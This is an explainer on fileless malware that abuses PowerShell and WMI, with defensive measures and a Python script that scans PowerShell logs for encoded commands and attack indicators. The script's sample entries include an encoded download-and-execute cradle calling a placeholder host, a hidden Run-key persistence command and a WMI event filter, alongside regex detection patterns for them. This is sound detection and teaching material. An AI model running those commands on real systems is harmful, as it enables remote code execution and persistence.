Fileless malware is a type of malicious software that abuses legitimate, already-installed programs to compromise a computer. Because it does not drop an executable of its own, it leaves little on disk for file-based antivirus to scan, which makes it hard to detect and to remove. Fileless malware became a mainstream type of attack in 2017, but many of the underlying techniques had been in use for years before that. Fileless malware is sometimes treated as synonymous with in-memory malware, since both perform their core functionality without writing data to disk during the lifetime of their operation.
Unlike traditional malware, a fileless attack does not drop an executable or install software on the victim's device. In other words, Windows is turned against itself.
Fileless malware attacks take built-in Windows tools, especially PowerShell and Windows Management Instrumentation (WMI), and turn them to malicious ends such as moving laterally to other machines.
PowerShell and WMI are pre-installed on every Windows machine and are designed for automating administrative tasks. PowerShell, for example, gives scripted access to the .NET Framework and the Windows API.
Using legitimate programs makes these attacks hard to spot for most security products and even for skilled analysts. The reason is simple: PowerShell and WMI are signed Microsoft binaries, so a file-based scanner has nothing to flag, and any command they execute tends to be assumed to be as legitimate as the tool running it. The caveat is that the commands themselves are still visible if you look for them: PowerShell script block logging (Event ID 4104), module logging and the Antimalware Scan Interface (AMSI) expose the decoded script content at run time, so detection shifts from scanning files to inspecting what the trusted tools are told to do.
The initial infection usually involves tricking the user into opening a malicious document or visiting a malicious website. Although this is typical of malware attacks in general, the payload does not create files on the device's hard drive; it resides only in memory.
The next stage of the attack varies but often includes creating entries in the device's registry for persistence (a Run key holding an encoded PowerShell command, or a WMI permanent event subscription, are common choices) and launching trusted processes such as PowerShell or WMI to run the payload.
Afterwards, the infected machine may attempt to propagate to other connected devices, download additional malware onto the infected device, and download and execute further scripts.
Potential Infection Vectors
- Physical transfer
  Attack vector: A user connects an infected device or removable media to a machine.
- Social Engineering (Phishing)
  - Infected links
    Attack vector: A user follows a link in an email to a malicious website.
  - Infected attachments
    Attack vector: A user opens an attached document and follows a link inside it to a malicious website.
- Web application
  Attack vector: A malicious actor exploits a weakness in a website to inject code that executes in the browser of any user who visits the site (a drive-by or watering-hole attack).
Defensive Measures
- Patch and upgrade management, including staying up to date with vendor-issued security advisories and application releases.
- Architect a layered IT defense environment, including hardening endpoints (for example, enabling PowerShell script block logging and Constrained Language Mode) and disabling non-essential applications and services.
- Strong user awareness, including encouraging users to report suspicious activity and implementing cyber security training.
- Log management, including regular review of system and server logs, with PowerShell script block and WMI activity logs in particular, and periodic audits.
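As an added example (not code from the original article), the following Python script shows the log-review side of that last point against the attack chain described earlier: it takes PowerShell script block log lines in a simplified `record|script` form, decodes any -EncodedCommand argument (Base64 of UTF-16LE) and flags download cradles, Run-key persistence, WMI event subscriptions and hidden windows. The log format, the indicator list and the sample entries are all assumptions constructed for this example; real Event ID 4104 records carry the script text in the ScriptBlockText field, and the regular expressions are leads for an analyst rather than a complete rule set.

```python
import base64
import re
from typing import Dict, List, Optional

# Indicator patterns, keyed by a short name, run over the raw plus decoded
# script text. Illustrative only: a hit is a lead for an analyst, not proof.
INDICATORS = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|"
        r"\bIEX\b|Invoke-Expression",
        re.IGNORECASE,
    ),
    "registry_run_key": re.compile(r"CurrentVersion\\Run(?:Once)?\b", re.IGNORECASE),
    "wmi_subscription": re.compile(
        r"__EventFilter|__FilterToConsumerBinding|"
        r"CommandLineEventConsumer|ActiveScriptEventConsumer",
        re.IGNORECASE,
    ),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
}

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same
# parameter; the argument is Base64 of the UTF-16LE script text.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_encoded_command(script: str) -> Optional[str]:
    """Return the plaintext behind an -EncodedCommand argument, or None."""
    match = ENCODED_RE.search(script)
    if match is None:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        # Not valid Base64/UTF-16LE: leave it to the raw-text patterns.
        return None


def analyze_script(script: str) -> Dict[str, object]:
    """Decode any encoded command, then run every indicator over raw + decoded text."""
    decoded = decode_encoded_command(script)
    text = script if decoded is None else script + "\n" + decoded
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(text)]
    if decoded is not None:
        hits.insert(0, "encoded_command")
    return {"indicators": hits, "decoded": decoded}


def scan_log(log_text: str) -> List[Dict[str, object]]:
    """Scan 'record|script' lines and return only the records with indicators."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record_id, _, script = line.partition("|")
        result = analyze_script(script)
        if result["indicators"]:
            findings.append({"record": record_id, **result})
    return findings


def build_sample_log() -> str:
    """Constructed sample entries (not real telemetry): one encoded download
    cradle, one Run-key persistence write, one WMI event filter, two benign."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    encoded = base64.b64encode(cradle.encode("utf-16le")).decode("ascii")
    return "\n".join([
        r"1|Get-ChildItem C:\Users\alice\Documents",
        f"2|powershell.exe -NoP -W Hidden -EncodedCommand {encoded}",
        r"3|Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run "
        r"-Name Updater -Value 'powershell -w hidden -c IEX (Get-ItemProperty HKCU:\Software\Acme).Payload'",
        r"4|Set-WmiInstance -Namespace root\subscription -Class __EventFilter "
        r"-Arguments @{Name='f'; Query='SELECT * FROM __InstanceModificationEvent'}",
        "5|Get-Process | Sort-Object CPU -Descending | Select-Object -First 5",
    ])


if __name__ == "__main__":
    for finding in scan_log(build_sample_log()):
        print(finding["record"], finding["indicators"])
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

The decode step is the part that matters: the encoded record contains none of the indicator strings in its raw form, and only reveals the download cradle once the Base64/UTF-16LE layer is peeled off. The same approach applies to the abbreviated -e and -enc spellings, which the pattern accepts alongside the full parameter name.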